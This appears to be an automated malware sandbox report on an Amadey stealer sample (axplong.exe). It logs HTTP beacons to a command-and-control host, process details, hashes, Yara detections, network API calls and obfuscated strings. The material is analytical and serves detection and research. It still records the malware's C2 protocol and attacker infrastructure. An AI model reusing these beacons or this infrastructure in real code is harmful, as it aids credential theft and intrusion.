Sep 27, 2024 00:22:20.154675007 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:20.868308067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	49879	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:20.984036922 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:21.766587019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49880	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:21.777057886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:22.489363909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	49881	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:22.617474079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:23.325001955 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	49882	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:23.469719887 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:24.158423901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	49883	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:24.283174038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:24.978569984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	49884	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:24.993017912 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:25.712681055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	49885	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:25.831515074 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:26.531402111 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	49886	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:26.546818018 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:27.260195971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	18:20:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x280000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1753740859.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1794273100.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:20:07
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1806644631.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:20:07
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1849863375.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1809437017.0000000005250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:21:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2368636814.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2328198252.0000000005350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:22:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2934260432.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2978601103.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:23:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.3527716082.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3570626421.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:24:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xce0000
File size:	1'877'504 bytes
MD5 hash:	D47F5061136CBB1FC4D56BC8E0355C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.4135878691.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.4177804471.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 04FB05E1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1796252225.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8453a02821da6106a2f5ffe57508ca92121903cee5bf4c8e853673c88a6f16e1
Instruction ID: 8c528a5c38171de614fddc938cedf00e5ef51501ba20c0dc0c30e56a4e357839
Opcode Fuzzy Hash: 8453a02821da6106a2f5ffe57508ca92121903cee5bf4c8e853673c88a6f16e1
Instruction Fuzzy Hash: 07F09732508210CFC301AB7390951EF77E6BF83210B5028ABE482D7951FF22A897B6D2

Function 04FB05AE Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1796252225.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 826eeb8a4dbadd475c8cbda70d506f3788d4aea367c2bbbd41c19346d7e13886
Instruction ID: 2e0b2789415525652493bd9439ef52fc131897b3dfd316e37ec1fca5cb04e8d9
Opcode Fuzzy Hash: 826eeb8a4dbadd475c8cbda70d506f3788d4aea367c2bbbd41c19346d7e13886
Instruction Fuzzy Hash: 43E0687720C201DE40006A2350409FB7B976B832317120557A0C3B2A50BEA1358F76EF

Non-executed Functions

Function 04FB08CB Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

4]G, xrefs: 04FB0A6F

Memory Dump Source

Source File: 00000000.00000002.1796252225.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID: 4]G
API String ID: 0-3952570547
Opcode ID: ef58485533c73242a1ede38d48917826a721c47d7ada1fe501e66d7d3f5b7c28
Instruction ID: fd72a028b4a2d8be9b158d707a2feaadde2346cbf4bb5c664f10b2d24a3b7210
Opcode Fuzzy Hash: ef58485533c73242a1ede38d48917826a721c47d7ada1fe501e66d7d3f5b7c28
Instruction Fuzzy Hash: BE417DE760C3816EF10195A26B549FB7B6DE7C3730730842AF4C2C7202FA94590B61F1

Function 04FB09F8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

4]G, xrefs: 04FB0A6F

Memory Dump Source

Source File: 00000000.00000002.1796252225.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_file.jbxd

Similarity

API ID:
String ID: 4]G
API String ID: 0-3952570547
Opcode ID: 84942738a55365275818affe508b1753acfedec09b14e1e0af6af4f632de27b0
Instruction ID: 6b885737ac4b9623ccf2bde4eda2baa4fc1cb152a56a85e7b4664376dc705dbb
Opcode Fuzzy Hash: 84942738a55365275818affe508b1753acfedec09b14e1e0af6af4f632de27b0
Instruction Fuzzy Hash: 1901A1EB60C3416EF211D5A16A54AFB7BBEEAD3730734886EF482C9142E695090F5272

Analysis Process: axplong.exePID: 1220, Parent PID: 6636COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.2%
Total number of Nodes:	559
Total number of Limit Nodes:	20

Executed Functions

Function 00CEBD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00D38D70,00000000,00000000,00000000,00000000), ref: 00CEBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CEBE11
HttpOpenRequestA.WININET(?,00000000), ref: 00CEBE5B
HttpSendRequestA.WININET(?,00000000), ref: 00CEBF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 00CEBFCD
InternetCloseHandle.WININET(?), ref: 00CEC0A7
InternetCloseHandle.WININET(?), ref: 00CEC0AF
InternetCloseHandle.WININET(?), ref: 00CEC0B7

Strings

8KG0fymoFx==, xrefs: 00CEC2EB, 00CEC543
RpKt, xrefs: 00CED516
stoi argument out of range, xrefs: 00CEE3FA
RHYTYv==, xrefs: 00CEBE33
invalid stoi argument, xrefs: 00CEE404
8KG0fCKZFzY=, xrefs: 00CEC385

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: 225925bd23761e449c3f7749deafad30519760682be0931fbb2d62aaffeb1e1d
Instruction ID: 29601fa1878c5852180b5afac47b83258f15b590bb249e9830f6a4af4f762b45
Opcode Fuzzy Hash: 225925bd23761e449c3f7749deafad30519760682be0931fbb2d62aaffeb1e1d
Instruction Fuzzy Hash: 3CB104B1A001589BEB28CF29CC84BAEBB79EF45304F5041A8F509972C2D7749EC5CFA5

Function 00CF42A0 Relevance: 42.8, APIs: 1, Strings: 22, Instructions: 2558sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00CF795C
Part of subcall function 00CF7870: __Cnd_destroy_in_situ.LIBCPMT ref: 00CF7968
Part of subcall function 00CF7870: __Mtx_destroy_in_situ.LIBCPMT ref: 00CF7971

Part of subcall function 00CEBD60: InternetOpenW.WININET(00D38D70,00000000,00000000,00000000,00000000), ref: 00CEBDED
Part of subcall function 00CEBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CEBE11
Part of subcall function 00CEBD60: HttpOpenRequestA.WININET(?,00000000), ref: 00CEBE5B

std::_Xinvalid_argument.LIBCPMT ref: 00CF4EA2
Sleep.KERNEL32 ref: 00CF6B65

Strings

5F6, xrefs: 00CF5497
V0N6, xrefs: 00CF537A
246122658369, xrefs: 00CF4F3A, 00CF4F4D, 00CF4F8F, 00CF4F99, 00CF54F4
JB6, xrefs: 00CF53F5
KFT0PL==, xrefs: 00CF54B9
MJF+, xrefs: 00CF47BD, 00CF48EC, 00CF4ADC, 00CF4C0B
fed3aa, xrefs: 00CF5489
9KN6, xrefs: 00CF5351
invalid stoi argument, xrefs: 00CF4E9D
V0x6, xrefs: 00CF541E
6F9fr==, xrefs: 00CF4712
aZT6, xrefs: 00CF53CC
Vp 6, xrefs: 00CF5447
stoi argument out of range, xrefs: 00CF4EAC
MJB+, xrefs: 00CF4776, 00CF47ED, 00CF4A95, 00CF4B0C
8ZF6, xrefs: 00CF5502
Fz==, xrefs: 00CF4D2D
96B6, xrefs: 00CF5470
WJP6, xrefs: 00CF53A3
9526, xrefs: 00CF531D
mP=, xrefs: 00CF6383
aqB6, xrefs: 00CF54DB

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4201286991-2304726402
Opcode ID: 691e769cecfe518ab56ff3b4f1b2c2ec5d5d2ef780b090496594069469e21d68
Instruction ID: 4293d5dba07b12a3241578c5f369af69b17aae3c259f5e84a74643e53d8dc319
Opcode Fuzzy Hash: 691e769cecfe518ab56ff3b4f1b2c2ec5d5d2ef780b090496594069469e21d68
Instruction Fuzzy Hash: 38232771E0014C9BEF19DB28CD897ADBB769F81304F548298E109AB2C6DB359F85CF52

Function 00CF46C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00CF7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00CF795C
Part of subcall function 00CF7870: __Cnd_destroy_in_situ.LIBCPMT ref: 00CF7968
Part of subcall function 00CF7870: __Mtx_destroy_in_situ.LIBCPMT ref: 00CF7971

Part of subcall function 00CEBD60: InternetOpenW.WININET(00D38D70,00000000,00000000,00000000,00000000), ref: 00CEBDED
Part of subcall function 00CEBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CEBE11
Part of subcall function 00CEBD60: HttpOpenRequestA.WININET(?,00000000), ref: 00CEBE5B

std::_Xinvalid_argument.LIBCPMT ref: 00CF4EA2

Strings

5F6, xrefs: 00CF5497
